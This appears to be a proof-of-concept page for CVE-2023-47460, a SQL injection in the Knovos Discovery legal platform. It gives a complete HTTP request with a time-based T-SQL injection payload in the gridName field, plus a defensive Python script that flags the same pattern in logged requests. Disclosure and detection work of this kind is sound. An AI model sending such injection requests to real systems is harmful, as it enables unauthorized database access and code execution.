CVE-2023-47460 PoC — Knovos Discovery Security Vulnerability

Source
Associated Vulnerability
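Title: Knovos Discovery Security Vulnerability (CVE-2023-47460)
Description: Knovos Discovery is a comprehensive legal discovery platform from Knovos. Knovos Discovery v.22.67.0 contains a security vulnerability stemming from a SQL injection flaw that allows a remote attacker to execute arbitrary code via the /DiscoveryProcess/Service/Admin.svc/getGridColumnStructure component.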
Readme
# CVE-2023-47460

## Description

SQL injection vulnerability in Knovos Discovery v.22.67.0 allows a remote attacker to execute arbitrary code via the /DiscoveryProcess/Service/Admin.svc/getGridColumnStructure component.

## Vulnerability Type

SQL Injection

## Vendor of Product

Knovos Discovery

## Affected Product Code Base

Version 22.67.0 - Version 22.67.0

## Affected Component

/DiscoveryProcess/Service/Admin.svc/getGridColumnStructure

## Attack Type

Remote

## Impact Code execution

true

## Impact Information Disclosure

true

## Discoverer

- Aleksey Vistorobskiy

## Attack Vectors

authorized user


Request:
```
POST /DiscoveryProcess/Service/Admin.svc/getGridColumnStructure?caseMappingId=*** HTTP/1.1
Host: vuln_host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 73
Connection: close

{
  "gridName":"Inventory-grid' waitfor delay'0:0:50'--",
  "uID":"10"
}

```

Response:
![](/1.jpg)
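
A defender-side check for the request shown above, as an added example that is not part of the original README or of Knovos code: it inspects logged request bodies sent to this endpoint and flags `gridName` values carrying SQL metacharacters or the T-SQL `WAITFOR DELAY` construct. The allowlist pattern for grid names, the function names and the sample records are assumptions constructed for illustration.

```python
import json
import re

ENDPOINT = "/DiscoveryProcess/Service/Admin.svc/getGridColumnStructure"

# Assumption: legitimate grid names use only letters, digits, '_' and '-'.
SAFE_GRID_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

# SQL metacharacters and the time-delay construct seen in the request above.
SUSPICIOUS = [
    ("quote", re.compile(r"'")),
    ("sql-comment", re.compile(r"--|/\*")),
    ("statement-separator", re.compile(r";")),
    ("waitfor-delay", re.compile(r"waitfor\s+delay", re.I)),
]

def inspect_request(path, body):
    """Return findings for one logged request; an empty list means clean."""
    if path.split("?", 1)[0] != ENDPOINT:
        return []  # other endpoints are out of scope for this check
    try:
        grid_name = json.loads(body).get("gridName")
    except (ValueError, AttributeError, TypeError):
        return ["unparseable-body"]
    if not isinstance(grid_name, str):
        return ["gridName-missing-or-not-string"]
    findings = [name for name, rx in SUSPICIOUS if rx.search(grid_name)]
    if not findings and not SAFE_GRID_NAME.match(grid_name):
        findings.append("outside-allowlist")
    return findings

def scan(records):
    """Return (index, findings) for every record that produced findings."""
    hits = []
    for i, (path, body) in enumerate(records):
        findings = inspect_request(path, body)
        if findings:
            hits.append((i, findings))
    return hits

# Constructed sample records (path, raw body); caseMappingId values are placeholders.
SAMPLES = [
    (ENDPOINT + "?caseMappingId=1", json.dumps({"gridName": "Inventory-grid", "uID": "10"})),
    (ENDPOINT + "?caseMappingId=1",
     json.dumps({"gridName": "Inventory-grid' waitfor delay'0:0:50'--", "uID": "10"})),
    (ENDPOINT + "?caseMappingId=1", json.dumps({"gridName": "Inventory grid", "uID": "10"})),
    ("/other/path", json.dumps({"gridName": "x'"})),
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLES):
        print(index, findings)
```

The same allowlist, enforced server-side before the value reaches a parameterized query, is the corresponding input-validation control.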

## Reference

- https://www.knovos.com/
- https://github.com/aleksey-vi/CVE-2023-47460
File Snapshot

```
[4.0K] /data/pocs/652b0e892ae22c0bf9cf9982b8fe6da5c6704ade
├── [ 50K] 1.jpg
└── [1.1K] README.md

0 directories, 2 files
```